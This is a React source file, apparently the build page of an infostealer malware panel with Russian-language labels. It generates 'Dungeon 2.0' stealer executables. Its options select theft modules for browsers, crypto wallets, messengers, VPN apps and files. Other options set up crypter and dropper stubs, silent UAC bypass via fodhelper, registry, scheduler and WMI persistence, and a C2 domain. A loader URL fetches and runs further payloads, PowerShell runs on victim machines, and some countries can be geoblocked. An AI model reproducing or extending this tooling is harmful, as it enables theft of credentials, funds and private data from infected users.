import React, { useEffect, useMemo, useState } from 'react';
import toast from 'react-hot-toast';
import api, { cacheGet, cacheSet, downloadApiBlob, listFrom } from '../api';

const MOD = {
  HOSTDATA: 1 << 0,
  SCREEN: 1 << 1,
  MESSENGERS: 1 << 2,
  WALLETS: 1 << 3,
  APPS: 1 << 4,
  GRABBER: 1 << 5,
  SYSINFO: 1 << 6,
  EXTENSIONS: 1 << 7,
  BROWSERS: 1 << 8,
  LOADER: 1 << 9,
};

const MOD_ALL = 0x000003ff;

const MODULE_OPTS = [
  { bit: MOD.BROWSERS, label: 'Браузеры' },
  { bit: MOD.EXTENSIONS, label: 'Расширения' },
  { bit: MOD.WALLETS, label: 'Кошельки' },
  { bit: MOD.MESSENGERS, label: 'Мессенджеры' },
  { bit: MOD.APPS, label: 'Apps / VPN' },
  { bit: MOD.GRABBER, label: 'Файлы' },
  { bit: MOD.SCREEN, label: 'Скриншот' },
  { bit: MOD.SYSINFO, label: 'Sysinfo' },
  { bit: MOD.HOSTDATA, label: 'Host data' },
  { bit: MOD.LOADER, label: 'Loader tasks' },
];

const DUNGEON_STUBS = [
  { id: 'auto', label: 'Auto ★ mid, прокладка ротация каждый create', crypt: 'crypted', loader: 'mid' },
  { id: 'mid', label: 'Crypt Mid ~3.2MB крипт v7', crypt: 'crypted', loader: 'mid' },
  { id: 'xl', label: 'Crypt XL ~70MB дроппер NSIS', crypt: 'crypted', loader: 'xl' },
  { id: 'plain', label: 'Plain stealer чистый данжен', crypt: 'plain', loader: 'plain' },
];

function stubsFor() {
  return DUNGEON_STUBS;
}

function stubLabelFor(b) {
  const list = DUNGEON_STUBS;
  const id = stubFromBuild(b);
  return (list.find((s) => s.id === id) || list[0]).label;
}

/* Recommended = Dungeon 2.0 crypt v7 (mid). */
const RECOMMENDED = {
  stealer: 'dungeon',
  stub: 'auto',
  copyCount: 2,
  hideFiles: true,
  autoSteal: 'every',
  forceAdmin: 'normal',
  install: 'appdata',
  autorun: 'none',
  modules: MOD_ALL,
  domain: 'rainmeter.co',
};

const GEO_PRESETS = ['RU', 'UA', 'BY', 'KZ', 'US', 'DE', 'PL', 'TR', 'IN', 'BR', 'GB', 'FR'];

function suggestFileName(name) {
  const base = String(name || '')
    .trim()
    .replace(/[^\w.-]+/g, '_')
    .replace(/^_+|_+$/g, '');
  if (!base) return 'setup.exe';
  return /\.exe$/i.test(base) ? base : `${base}.exe`;
}

function randomMutex(prefix = 'APEX') {
  const alphabet = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789';
  let s = '';
  for (let i = 0; i < 14; i++) s += alphabet[(Math.random() * alphabet.length) | 0];
  return `${prefix}_${s}`;
}

function bitsToList(mask) {
  const n = Number(mask) || MOD_ALL;
  return MODULE_OPTS.filter((m) => (n & m.bit) !== 0).map((m) => m.label).join(', ');
}

function stubFromBuild(b) {
  if ((b.crypt_mode || 'crypted') === 'plain') return 'plain';
  return b.loader_variant || RECOMMENDED.stub;
}

export default function Builder() {
  const [builds, setBuilds] = useState(() => cacheGet('builds', []));
  const [show, setShow] = useState(false);
  const [panel, setPanel] = useState(null); // 'scripts' | 'geo' | null
  const [loading, setLoading] = useState(false);

  const [name, setName] = useState('');
  const [comment, setComment] = useState('');
  const [mutex, setMutex] = useState(() => randomMutex('WEBR'));
  const [copyCount, setCopyCount] = useState(RECOMMENDED.copyCount);
  const [hideFiles, setHideFiles] = useState(RECOMMENDED.hideFiles);
  const [stub, setStub] = useState(RECOMMENDED.stub);
  const [autoSteal, setAutoSteal] = useState(RECOMMENDED.autoSteal);
  const [forceAdmin, setForceAdmin] = useState(RECOMMENDED.forceAdmin);
  const [autoElevate, setAutoElevate] = useState(false);
  const [install, setInstall] = useState(RECOMMENDED.install);
  const [fileName, setFileName] = useState('setup.exe');
  const [autorun, setAutorun] = useState(RECOMMENDED.autorun);
  const [domain, setDomain] = useState(RECOMMENDED.domain);
  const [modules, setModules] = useState(RECOMMENDED.modules);
  const [scripts, setScripts] = useState('');
  const [geoblock, setGeoblock] = useState([]);
  const [loaderUrl, setLoaderUrl] = useState('');
  const [loaderType, setLoaderType] = useState('exe');
  const [logoPngB64, setLogoPngB64] = useState('');
  const [logoName, setLogoName] = useState('');
  const [archivePass, setArchivePass] = useState('—');
  const [busy, setBusy] = useState(false);

  const moduleCount = useMemo(
    () => MODULE_OPTS.filter((m) => (modules & m.bit) !== 0).length,
    [modules]
  );

  const stubList = stubsFor();
  const stubMeta = stubList.find((s) => s.id === stub) || stubList[0];

  async function loadArchivePassword() {
    try {
      const [settingsRes, meRes] = await Promise.all([
        api.get('/settings').catch(() => ({ data: {} })),
        api.get('/me').catch(() => ({ data: {} })),
      ]);
      const pass = meRes.data?.archive_password || settingsRes.data?.archive_password;
      if (pass) setArchivePass(pass);
    } catch {
      /* keep */
    }
  }

  async function load() {
    setLoading(true);
    try {
      const { data } = await api.get('/builds');
      const list = listFrom(data, 'builds');
      setBuilds(list);
      cacheSet('builds', list);
      await loadArchivePassword();
    } catch (err) {
      toast.error('Ошибка билдов');
      throw err;
    } finally {
      setLoading(false);
    }
  }

  useEffect(() => {
    load().catch(() => {});
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, []);

  function resetForm() {
    setName('');
    setComment('');
    setMutex(randomMutex('WEBR'));
    setCopyCount(RECOMMENDED.copyCount);
    setHideFiles(RECOMMENDED.hideFiles);
    setStub(RECOMMENDED.stub);
    setAutoSteal(RECOMMENDED.autoSteal);
    setForceAdmin(RECOMMENDED.forceAdmin);
    setAutoElevate(false);
    setInstall(RECOMMENDED.install);
    setFileName('setup.exe');
    setAutorun(RECOMMENDED.autorun);
    setDomain(RECOMMENDED.domain);
    setModules(RECOMMENDED.modules);
    setScripts('');
    setGeoblock([]);
    setLoaderUrl('');
    setLoaderType('exe');
    setLogoPngB64('');
    setLogoName('');
    setPanel(null);
  }

  function buildOptions() {
    const o = {
      mutex,
      comment: comment || name,
      copy_count: copyCount,
      hide_files: hideFiles,
      auto_steal: autoSteal,
      force_admin: forceAdmin,
      autoelevate: autoElevate,
      install,
      autorun,
      scripts,
      geoblock,
      stub,
      loader_url: loaderUrl.trim(),
      loader_type: loaderType,
    };
    if (logoPngB64) o.logo_png_b64 = logoPngB64;
    return o;
  }

  function onLogoFile(e) {
    const f = e.target.files && e.target.files[0];
    if (!f) {
      setLogoPngB64('');
      setLogoName('');
      return;
    }
    if (!/\.png$/i.test(f.name) && f.type !== 'image/png') {
      toast.error('Только PNG');
      e.target.value = '';
      return;
    }
    if (f.size > 240 * 1024) {
      toast.error('PNG максимум ~240 KB (слот 256 KB)');
      e.target.value = '';
      return;
    }
    const reader = new FileReader();
    reader.onload = () => {
      const s = String(reader.result || '');
      if (!s.startsWith('data:image/png')) {
        toast.error('Файл не PNG');
        return;
      }
      setLogoPngB64(s);
      setLogoName(f.name);
    };
    reader.readAsDataURL(f);
  }

  async function create(e) {
    e.preventDefault();
    if (!modules) {
      toast.error('Выбери хотя бы один модуль');
      return;
    }
    setBusy(true);
    try {
      const { data } = await api.post('/builds', {
        name,
        domain,
        file_name: fileName || suggestFileName(name),
        modules,
        crypt_mode: stubMeta.crypt,
        loader_variant: stubMeta.loader === 'plain' ? 'fat' : stubMeta.loader,
        stealer: 'dungeon',
        options: buildOptions(),
      }, { timeout: 30000 });
      setShow(false);
      resetForm();
      toast.success('Сборка запущена');
      load();
      const id = data && data.id;
      if (id) {
        const t0 = Date.now();
        while (Date.now() - t0 < 900000) {
          await new Promise((r) => setTimeout(r, 4000));
          const { data: row } = await api.get(`/builds/${id}`);
          load();
          if (row.status === 'active' && row.binary_path) {
            toast.success('Билд собран');
            break;
          }
          if (row.status === 'failed') {
            toast.error('Сборка упала');
            break;
          }
        }
      }
    } catch (err) {
      const msg = err?.response?.data?.message || err?.response?.data?.error || 'Не удалось создать билд';
      toast.error(msg);
    } finally {
      setBusy(false);
    }
  }

  async function remove(id) {
    if (!window.confirm('Удалить билд? Отстук по нему остановится.')) return;
    try {
      await api.delete(`/builds/${id}`);
      toast.success('Удалён');
      load();
    } catch {
      toast.error('Ошибка удаления');
    }
  }

  async function download(b) {
    try {
      const how = await downloadApiBlob(`/builds/${b.id}/download`, b.file_name || suggestFileName(b.name));
      if (how === 'abort') return;
      toast.success(how === 'fsa' ? 'Сохранено' : 'Скачивание…');
    } catch (err) {
      toast.error(err?.message || 'Ошибка скачивания');
    }
  }

  function toggleGeo(code) {
    setGeoblock((prev) => (prev.includes(code) ? prev.filter((c) => c !== code) : [...prev, code]));
  }

  return (
    <div>
      <div className="rm-page-title">Собрать билд</div>
      <div className="rm-help">
        <b>Помощь</b>
        Dungeon 2.0: Crypt Mid ~3.2MB (крипт v7) · Crypt XL ~70MB (NSIS дроппер) · Plain ~1.6MB.
        Стилер по умолчанию = Dungeon. Thin / Fat / Download — только Apex.
        Имя файла = Extension. Не переименовывай скачанный exe вручную.
      </div>

      <div className="rm-status-row">
        <span className="rm-chip red">Пароль от архива: <b>{archivePass}</b></span>
        <span className="rm-chip green">{new Date().toLocaleDateString('ru-RU')}</span>
        <span className="rm-chip orange">dungeon · mid · autorun · modules</span>
      </div>

      <div className={`rm-build-grid${loading ? ' rm-loading' : ''}`}>
        {builds.map((b) => {
          const full = Number(b.full_logs) || 0;
          const total = Math.max(Number(b.total_logs) || 0, full);
          const pct = total ? Math.round((full / total) * 100) : 0;
          const knocking = b.knocking ?? b.is_knocking ?? (total > 0 || full > 0);
          let opt = {};
          try { opt = typeof b.options_json === 'string' ? JSON.parse(b.options_json || '{}') : (b.options || {}); } catch { /* */ }
          const stubLabel = stubLabelFor(b);
          const stealTag = b.stealer === 'dungeon' ? 'Dungeon 2.0' : 'Apex';

          return (
            <div className="rm-card rm-build-card" key={b.id}>
              <div className="rm-build-top">
                <span>📄</span>
                <span>{(b.created_at || '').slice(0, 10)}</span>
              </div>
              <div style={{ display: 'flex', alignItems: 'center', gap: 8 }}>
                <h4 style={{ margin: 0 }}>{b.name}</h4>
                {knocking ? (
                  <span className="rm-chip green" style={{ padding: '4px 8px', fontSize: 11 }}>стучит</span>
                ) : (
                  <span className="rm-chip orange" style={{ padding: '4px 8px', fontSize: 11 }}>тишина</span>
                )}
                {b.status === 'building' ? (
                  <span className="rm-chip orange" style={{ padding: '4px 8px', fontSize: 11 }}>сборка</span>
                ) : null}
                {b.status === 'failed' ? (
                  <span className="rm-chip red" style={{ padding: '4px 8px', fontSize: 11 }}>fail</span>
                ) : null}
              </div>
              <div style={{ fontSize: 13, color: '#64748B' }}>
                Файл: <b>{b.file_name || suggestFileName(b.name)}</b>
              </div>
              <div style={{ fontSize: 12, color: '#64748B', marginTop: 4 }}>
                <span className="rm-chip" style={{ padding: '2px 6px', fontSize: 11, marginRight: 6 }}>{stealTag}</span>
                {stubLabel}
                {opt.autorun && opt.autorun !== 'none' ? ` · autorun:${opt.autorun}` : ''}
                {' · '}
                {bitsToList(b.modules ?? MOD_ALL)}
              </div>
              <div style={{ fontSize: 13, color: '#64748B' }}>Полных: {full} / {total || 0}</div>
              <div className="rm-progress"><i style={{ width: `${pct}%` }} /></div>
              <div style={{ fontSize: 13, color: '#64748B' }}>{b.domain || domain}</div>
              <div style={{ display: 'flex', gap: 8, marginTop: 4 }}>
                <button type="button" className="rm-icon-btn danger" onClick={() => remove(b.id)} title="Удалить">🗑</button>
                <button type="button" className="rm-btn success" style={{ flex: 1, justifyContent: 'center' }} onClick={() => download(b)} disabled={b.status === 'building' || b.status === 'failed'}>
                  Скачать
                </button>
              </div>
            </div>
          );
        })}

        <button type="button" className="rm-build-new" onClick={() => { resetForm(); setShow(true); }}>
          <span className="rm-btn success">+ Новый билд</span>
        </button>
      </div>

      {show && (
        <div className="rm-modal-bg" onClick={() => setShow(false)}>
          <form
            className="rm-modal rm-builder-modal"
            onClick={(e) => e.stopPropagation()}
            onSubmit={create}
          >
            <div className="rm-builder-head">
              <h3>Close builder</h3>
              <button type="button" className="rm-btn ghost" style={{ padding: '4px 10px' }} onClick={() => setShow(false)}>✕</button>
            </div>

            <div className="rm-builder-grid">
              <div className="rm-field">
                <label>Name</label>
                <input
                  value={name}
                  onChange={(e) => {
                    const v = e.target.value;
                    setName(v);
                    if (!comment || comment === name) setComment(v);
                    setFileName(suggestFileName(v));
                  }}
                  placeholder="voidstr"
                  required
                />
              </div>
              <div className="rm-field">
                <label>Auto Steal</label>
                <select value={autoSteal} onChange={(e) => setAutoSteal(e.target.value)}>
                  <option value="every">Каждый запуск</option>
                  <option value="once">Один раз</option>
                </select>
              </div>

              <div className="rm-field">
                <label>Mutex</label>
                <div className="rm-inline">
                  <input value={mutex} onChange={(e) => setMutex(e.target.value)} required />
                  <button type="button" className="rm-btn ghost" onClick={() => setMutex(randomMutex('WEBR'))}>↻</button>
                </div>
              </div>
              <div className="rm-field">
                <label>Force admin</label>
                <select value={forceAdmin} onChange={(e) => setForceAdmin(e.target.value)}>
                  <option value="normal">Обычный</option>
                  <option value="force">Force UAC / admin</option>
                </select>
              </div>
              <div className="rm-field">
                <label className="rm-checkline">
                  <input type="checkbox" checked={autoElevate} onChange={(e) => setAutoElevate(e.target.checked)} />
                  <span>Silent elevate (fodhelper, filtered admin)</span>
                </label>
              </div>

              <div className="rm-field">
                <label>Comment</label>
                <input value={comment} onChange={(e) => setComment(e.target.value)} placeholder="voidstr" />
              </div>
              <div className="rm-field">
                <label>Install</label>
                <select value={install} onChange={(e) => setInstall(e.target.value)}>
                  <option value="random">Random</option>
                  <option value="appdata">%AppData%</option>
                  <option value="temp">%Temp%</option>
                  <option value="none">Без установки</option>
                </select>
              </div>

              <div className="rm-field">
                <label>Copy count</label>
                <div className="rm-stepper">
                  <button type="button" className="rm-btn ghost" onClick={() => setCopyCount((n) => Math.max(1, n - 1))}>−</button>
                  <input
                    type="number"
                    min={1}
                    max={10}
                    value={copyCount}
                    onChange={(e) => setCopyCount(Math.max(1, Math.min(10, Number(e.target.value) || 1)))}
                  />
                  <button type="button" className="rm-btn ghost" onClick={() => setCopyCount((n) => Math.min(10, n + 1))}>+</button>
                </div>
              </div>
              <div className="rm-field">
                <label>Extension</label>
                <input
                  value={fileName}
                  onChange={(e) => setFileName(e.target.value)}
                  placeholder="voidstr.exe"
                  required
                />
              </div>

              <div className="rm-field">
                <label className="rm-checkline">
                  <input type="checkbox" checked={hideFiles} onChange={(e) => setHideFiles(e.target.checked)} />
                  <span>Hide files</span>
                </label>
              </div>
              <div className="rm-field">
                <label>Autorun</label>
                <select value={autorun} onChange={(e) => setAutorun(e.target.value)}>
                  <option value="none">Выкл</option>
                  <option value="scheduler">Scheduler</option>
                  <option value="registry">Registry</option>
                  <option value="wmi">WMI</option>
                  <option value="all">Registry + Scheduler</option>
                </select>
              </div>

              <div className="rm-field">
                <label>Stub</label>
                <select value={stub} onChange={(e) => setStub(e.target.value)}>
                  {stubList.map((s) => (
                    <option key={s.id} value={s.id}>{s.label}</option>
                  ))}
                </select>
                <span style={{ color: '#64748B', fontSize: 12, marginTop: 4, display: 'block' }}>
                  Mid = крипт v7, drop wcc-host. XL = NSIS+electron ~70MB. Plain = сырой dungeon.exe.
                </span>
              </div>
              <div className="rm-field">
                <label>Логотип / иконка (PNG)</label>
                <input type="file" accept="image/png,.png" onChange={onLogoFile} />
                {logoName ? (
                  <span style={{ color: '#94A3B8', fontSize: 12 }}>{logoName} · → ICO в EXE</span>
                ) : (
                  <span style={{ color: '#64748B', fontSize: 12 }}>
                    пусто = random icon (или AI из Настроек)
                  </span>
                )}
              </div>
              <div className="rm-field">
                <label>Домен C2</label>
                <input value={domain} onChange={(e) => setDomain(e.target.value)} required />
              </div>
            </div>

            <div className="rm-field" style={{ marginTop: 14 }}>
              <label style={{ display: 'flex', justifyContent: 'space-between' }}>
                <span>Что собирать ({moduleCount})</span>
                <span style={{ display: 'flex', gap: 8 }}>
                  <button type="button" className="rm-btn ghost" style={{ padding: '2px 8px' }} onClick={() => setModules(MOD_ALL)}>все</button>
                  <button
                    type="button"
                    className="rm-btn ghost"
                    style={{ padding: '2px 8px' }}
                    onClick={() => setModules(MOD.BROWSERS | MOD.WALLETS | MOD.MESSENGERS | MOD.SYSINFO)}
                  >
                    мини
                  </button>
                </span>
              </label>
              <div className="rm-mod-grid">
                {MODULE_OPTS.map((m) => {
                  const on = (modules & m.bit) !== 0;
                  return (
                    <label key={m.bit} className={`rm-mod-chip ${on ? 'on' : ''}`}>
                      <input
                        type="checkbox"
                        checked={on}
                        onChange={() => setModules((prev) => ((prev & m.bit) ? (prev & ~m.bit) : (prev | m.bit)))}
                      />
                      {m.label}
                    </label>
                  );
                })}
              </div>
            </div>

            {(modules & MOD.LOADER) !== 0 && (
              <div className="rm-grid-2" style={{ marginTop: 12 }}>
                <div className="rm-field">
                  <label>Loader task URL (https)</label>
                  <input
                    value={loaderUrl}
                    onChange={(e) => setLoaderUrl(e.target.value)}
                    placeholder="https://cdn.example/payload.exe"
                  />
                </div>
                <div className="rm-field">
                  <label>Тип</label>
                  <select value={loaderType} onChange={(e) => setLoaderType(e.target.value)}>
                    <option value="exe">exe</option>
                    <option value="dll">dll</option>
                    <option value="ps1">ps1</option>
                  </select>
                </div>
              </div>
            )}

            <div className="rm-builder-note">
              ★ Defaults = Dungeon 2.0 Crypt Mid v7: dungeon · mid · modules all · copy×2 · hide · AppData · autorun off.
              Loader tasks: модуль уже включён — укажи URL если нужен payload.
            </div>

            <div className="rm-builder-actions">
              <button type="submit" className="rm-btn primary" disabled={busy}>{busy ? 'Сборка…' : 'Create'}</button>
              <button type="button" className="rm-btn ghost" onClick={() => setPanel(panel === 'scripts' ? null : 'scripts')}>Scripts</button>
              <button type="button" className="rm-btn ghost" onClick={() => setPanel(panel === 'geo' ? null : 'geo')}>GeoBlock</button>
            </div>

            {panel === 'scripts' && (
              <div className="rm-field" style={{ marginTop: 12 }}>
                <label>Scripts — PowerShell после успешного стука (≤48KB)</label>
                <textarea
                  value={scripts}
                  onChange={(e) => setScripts(e.target.value)}
                  placeholder="# выполняется на машине после /api/gate ok&#10;Write-Output 'hook'"
                />
              </div>
            )}

            {panel === 'geo' && (
              <div className="rm-field" style={{ marginTop: 12 }}>
                <label>GeoBlock — страны-исключения (не стучать)</label>
                <div className="rm-multi">
                  {GEO_PRESETS.map((code) => (
                    <label key={code}>
                      <input
                        type="checkbox"
                        checked={geoblock.includes(code)}
                        onChange={() => toggleGeo(code)}
                      />
                      {code}
                    </label>
                  ))}
                </div>
              </div>
            )}
          </form>
        </div>
      )}
    </div>
  );
}
